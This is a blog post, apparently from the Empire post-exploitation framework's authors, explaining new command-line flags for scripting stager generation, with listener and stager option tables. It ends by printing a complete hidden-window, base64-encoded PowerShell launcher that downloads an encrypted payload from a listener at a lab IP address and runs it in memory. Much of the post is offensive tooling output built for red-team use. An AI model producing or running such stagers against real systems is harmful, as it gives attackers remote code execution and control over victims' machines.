Empire’s CLI

This post is part of the ‘Empire Series’ with some background and an ongoing list of series posts [kept here].

Recently, an Empire user requested that we build a ‘standalone payload generator’, similar to msfvenom’s functionality. The motivation is to provide a scriptable capability that makes integration with other tools relatively easy. This short post will cover the newly integrated command line options for Empire which allow for the scripted generation of stagers.

To display the currently available options, run ./empire -h

# ./empire -h
usage: empire [-h] [--debug [DEBUG]] [-s [STAGER]]
              [-o [STAGER_OPTIONS [STAGER_OPTIONS ...]]] [-l [LISTENER]] [-v]

optional arguments:
  -h, --help            show this help message and exit
  --debug [DEBUG]       Debug level for output (default of 1).
  -s [STAGER], --stager [STAGER]
                        Specify a stager to generate. Lists all stagers if
                        none is specified.
  -o [STAGER_OPTIONS [STAGER_OPTIONS ...]], --stager-options [STAGER_OPTIONS [STAGER_OPTIONS ...]]
                        Supply options to set for a stager in OPTION=VALUE
                        format. Lists options if nothing is specified.
  -l [LISTENER], --listener [LISTENER]
                        Display listener options. Displays all listeners if
                        nothing is specified.
  -v, --version         Display current Empire version.

In order to effectively use Empire’s CLI, you need to have a listener currently set up so the data is stored in the backend empire.db database. In order to generate the stagers, an ./empire instance doesn’t have to be running at the same time (though it can be), but it does need to be executed from the same path as the Empire installation containing the configured listeners.

In order to display the active listeners, use ./empire -l

# ./empire -l

[*] Active listeners:

  ID    Name              Host                                 Type      Delay/Jitter   KillDate    Redirect Target
  --    ----              ----                                 -------   ------------   --------    ---------------
  1     test              http://192.168.52.142:8080           native    5/0.0                      
                   

To display the configuration for a particular listener, use ./empire -l <listener_name>

# ./empire -l test

Listener Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        test                             Listener name.
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  StagingKey        True        2c103f2c4ed1e59c0b4e2e01821770fa Staging key for initial agent negotiation.
  Type              True        native                           Listener type (native, pivot, hop).
  ID                True        1                                Listener ID.
  RedirectTarget    False                                        Listener target to redirect to for pivot/hop.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  Host              True        http://192.168.52.139:8080       Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  DefaultProfile    True        /admin/get.php,/news.asp,/login/ Default communication profile for the agent.
                                process.jsp|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Port              True        8080                             Port for the listener.

If you want to display the available Empire stagers, use ./empire -s

# ./empire -s

Stagers:

  Name             Description
  ----             -----------
  ducky            Generates a ducky script that runes a one-liner stage0 launcher for Empire.
  hta              Generates an HTA (HyperText Application) For Internet Explorer
  launcher         Generates a one-liner stage0 launcher for Empire.
  macro            Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.
  launcher_bat     Generates a self-deleting .bat launcher for Empire.
  dll              Generate a PowerPick Reflective DLL to inject with stager code.
  launcher_vbs     Generates a .vbs launcher for Empire.
  stager           Generates a (stage1) key-negotiation stager for Empire.
  pth_wmis         Generates a pth-wmis launcher for Empire.
  war              Generates a Deployable War file.
  hop_php          Generates a hop.php redirector for an Empire listener.

To see the configurable options for a given stager, use ./empire -s <stager_name>

# ./empire -s launcher

Name: Launcher

Description:
  Generates a one-liner stage0 launcher for Empire.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  Base64           True        True              Switch. Base64 encode the output.
  Listener         True                          Listener to generate stager for.
  OutFile          False                         File to output launcher to, otherwise
                                                 displayed on the screen.
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).

And finally, to generate a given stager, use the -o OPTION1=VALUE1 OPTION2=VALUE2 format. Be sure to note which options are required from the above configuration display.

# ./empire -s launcher -o Listener=test
powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAPQBOAEUAdwAtAE8AYgBKAGUAQwB0ACAAUwBZAHMAVABFAE0ALgBOAGUAVAAuAFcARQBiAEMAbABJAGUAbgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBjAC4ASABlAEEARABFAHIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBDAC4AUAByAE8AWABZACAAPQAgAFsAUwB5AFMAVABFAE0ALgBOAEUAVAAuAFcAZQBiAFIARQBxAHUARQBzAHQAXQA6ADoARABlAGYAYQB1AGwAVABXAGUAQgBQAHIATwB4AFkAOwAkAFcAQwAuAFAAUgBPAFgAWQAuAEMAUgBFAGQARQBOAHQASQBhAGwAcwAgAD0AIABbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBDAFIARQBkAGUAbgBUAGkAQQBsAEMAYQBDAGgAZQBdADoAOgBEAEUAZgBBAFUAbAB0AE4ARQB0AFcATwByAGsAQwByAEUAZABFAG4AdABpAEEATABTADsAJABLAD0AJwAyAGMAMQAwADMAZgAyAGMANABlAGQAMQBlADUAOQBjADAAYgA0AGUAMgBlADAAMQA4ADIAMQA3ADcAMABmAGEAJwA7ACQASQA9ADAAOwBbAGMASABBAHIAWwBdAF0AJABCAD0AKABbAEMASABBAHIAWwBdAF0AKAAkAFcAQwAuAEQAbwB3AG4ATABvAEEARABTAHQAcgBJAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQAyAC4AMQAzADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwByACQAawBbACQASQArACsAJQAkAEsALgBMAGUATgBHAHQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbgAnACcAKQA=

Have fun!

Leave a Comment

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.